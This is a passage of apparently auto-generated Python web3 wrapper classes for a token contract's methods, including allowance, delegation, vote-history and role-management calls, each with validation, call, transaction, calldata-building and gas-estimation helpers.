def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractUriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractURI method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractVersionMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractVersion method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class DecimalsMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the decimals method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class DecreaseAllowanceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the decreaseAllowance method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, spender: str, subtracted_value: int
):
"""Validate the inputs to the decreaseAllowance method."""
self.validator.assert_valid(
method_name="decreaseAllowance",
parameter_name="spender",
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name="decreaseAllowance",
parameter_name="subtractedValue",
argument_value=subtracted_value,
)
# safeguard against fractional inputs
subtracted_value = int(subtracted_value)
return (spender, subtracted_value)
def call(
self,
spender: str,
subtracted_value: int,
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value
)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(spender, subtracted_value).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
spender: str,
subtracted_value: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, subtracted_value).transact(
tx_params.as_dict()
)
def build_transaction(
self,
spender: str,
subtracted_value: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
spender, subtracted_value
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
spender: str,
subtracted_value: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, subtracted_value).estimateGas(
tx_params.as_dict()
)
class DelegateMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the delegate method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, delegatee: str):
"""Validate the inputs to the delegate method."""
self.validator.assert_valid(
method_name="delegate",
parameter_name="delegatee",
argument_value=delegatee,
)
delegatee = self.validate_and_checksum_address(delegatee)
return delegatee
def call(
self, delegatee: str, tx_params: Optional[TxParams] = None
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(delegatee) = self.validate_and_normalize_inputs(delegatee)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(delegatee).call(tx_params.as_dict())
def send_transaction(
self, delegatee: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(delegatee) = self.validate_and_normalize_inputs(delegatee)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(delegatee).transact(tx_params.as_dict())
def build_transaction(
self, delegatee: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(delegatee) = self.validate_and_normalize_inputs(delegatee)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(delegatee).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, delegatee: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(delegatee) = self.validate_and_normalize_inputs(delegatee)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(delegatee).estimateGas(
tx_params.as_dict()
)
class DelegateBySigMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the delegateBySig method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self,
delegatee: str,
nonce: int,
expiry: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
):
"""Validate the inputs to the delegateBySig method."""
self.validator.assert_valid(
method_name="delegateBySig",
parameter_name="delegatee",
argument_value=delegatee,
)
delegatee = self.validate_and_checksum_address(delegatee)
self.validator.assert_valid(
method_name="delegateBySig",
parameter_name="nonce",
argument_value=nonce,
)
# safeguard against fractional inputs
nonce = int(nonce)
self.validator.assert_valid(
method_name="delegateBySig",
parameter_name="expiry",
argument_value=expiry,
)
# safeguard against fractional inputs
expiry = int(expiry)
self.validator.assert_valid(
method_name="delegateBySig",
parameter_name="v",
argument_value=v,
)
self.validator.assert_valid(
method_name="delegateBySig",
parameter_name="r",
argument_value=r,
)
self.validator.assert_valid(
method_name="delegateBySig",
parameter_name="s",
argument_value=s,
)
return (delegatee, nonce, expiry, v, r, s)
def call(
self,
delegatee: str,
nonce: int,
expiry: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(
delegatee,
nonce,
expiry,
v,
r,
s,
) = self.validate_and_normalize_inputs(
delegatee, nonce, expiry, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(delegatee, nonce, expiry, v, r, s).call(
tx_params.as_dict()
)
def send_transaction(
self,
delegatee: str,
nonce: int,
expiry: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(
delegatee,
nonce,
expiry,
v,
r,
s,
) = self.validate_and_normalize_inputs(
delegatee, nonce, expiry, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
delegatee, nonce, expiry, v, r, s
).transact(tx_params.as_dict())
def build_transaction(
self,
delegatee: str,
nonce: int,
expiry: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(
delegatee,
nonce,
expiry,
v,
r,
s,
) = self.validate_and_normalize_inputs(
delegatee, nonce, expiry, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
delegatee, nonce, expiry, v, r, s
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
delegatee: str,
nonce: int,
expiry: int,
v: int,
r: Union[bytes, str],
s: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(
delegatee,
nonce,
expiry,
v,
r,
s,
) = self.validate_and_normalize_inputs(
delegatee, nonce, expiry, v, r, s
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
delegatee, nonce, expiry, v, r, s
).estimateGas(tx_params.as_dict())
class DelegatesMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the delegates method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str):
"""Validate the inputs to the delegates method."""
self.validator.assert_valid(
method_name="delegates",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return account
def call(self, account: str, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account).call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).transact(tx_params.as_dict())
def build_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).estimateGas(
tx_params.as_dict()
)
class GetPastTotalSupplyMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getPastTotalSupply method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, block_number: int):
"""Validate the inputs to the getPastTotalSupply method."""
self.validator.assert_valid(
method_name="getPastTotalSupply",
parameter_name="blockNumber",
argument_value=block_number,
)
# safeguard against fractional inputs
block_number = int(block_number)
return block_number
def call(
self, block_number: int, tx_params: Optional[TxParams] = None
) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(block_number) = self.validate_and_normalize_inputs(block_number)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(block_number).call(
tx_params.as_dict()
)
return int(returned)
def send_transaction(
self, block_number: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(block_number) = self.validate_and_normalize_inputs(block_number)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(block_number).transact(
tx_params.as_dict()
)
def build_transaction(
self, block_number: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(block_number) = self.validate_and_normalize_inputs(block_number)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(block_number).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, block_number: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(block_number) = self.validate_and_normalize_inputs(block_number)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(block_number).estimateGas(
tx_params.as_dict()
)
class GetPastVotesMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getPastVotes method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str, block_number: int):
"""Validate the inputs to the getPastVotes method."""
self.validator.assert_valid(
method_name="getPastVotes",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="getPastVotes",
parameter_name="blockNumber",
argument_value=block_number,
)
# safeguard against fractional inputs
block_number = int(block_number)
return (account, block_number)
def call(
self,
account: str,
block_number: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, block_number) = self.validate_and_normalize_inputs(
account, block_number
)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account, block_number).call(
tx_params.as_dict()
)
return int(returned)
def send_transaction(
self,
account: str,
block_number: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, block_number) = self.validate_and_normalize_inputs(
account, block_number
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, block_number).transact(
tx_params.as_dict()
)
def build_transaction(
self,
account: str,
block_number: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, block_number) = self.validate_and_normalize_inputs(
account, block_number
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, block_number).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
account: str,
block_number: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(account, block_number) = self.validate_and_normalize_inputs(
account, block_number
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, block_number).estimateGas(
tx_params.as_dict()
)
class GetPlatformFeeInfoMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getPlatformFeeInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Tuple[str, int]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return (
returned[0],
returned[1],
)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class GetRoleAdminMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleAdmin method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str]):
"""Validate the inputs to the getRoleAdmin method."""
self.validator.assert_valid(
method_name="getRoleAdmin",
parameter_name="role",
argument_value=role,
)
return role
def call(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role).call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).transact(tx_params.as_dict())
def build_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoleMemberMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleMember method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], index: int
):
"""Validate the inputs to the getRoleMember method."""
self.validator.assert_valid(
method_name="getRoleMember",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="getRoleMember",
parameter_name="index",
argument_value=index,
)
# safeguard against fractional inputs
index = int(index)
return (role, index)
def call(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role, index).call(
tx_params.as_dict()
)
return str(returned)
def send_transaction(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).estimateGas(
tx_params.as_dict()
)
class GetRoleMemberCountMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleMemberCount method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str]):
"""Validate the inputs to the getRoleMemberCount method."""
self.validator.assert_valid(
method_name="getRoleMemberCount",
parameter_name="role",
argument_value=role,
)
return role
def call(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).transact(tx_params.as_dict())
def build_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetVotesMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getVotes method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str):
"""Validate the inputs to the getVotes method."""
self.validator.assert_valid(
method_name="getVotes",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return account
def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).transact(tx_params.as_dict())
def build_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).estimateGas(
tx_params.as_dict()
)
class GrantRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the grantRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the grantRole method."""
self.validator.assert_valid(
method_name="grantRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="grantRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class HasRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the hasRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the hasRole method."""
self.validator.assert_valid(
method_name="hasRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="hasRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role, account).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
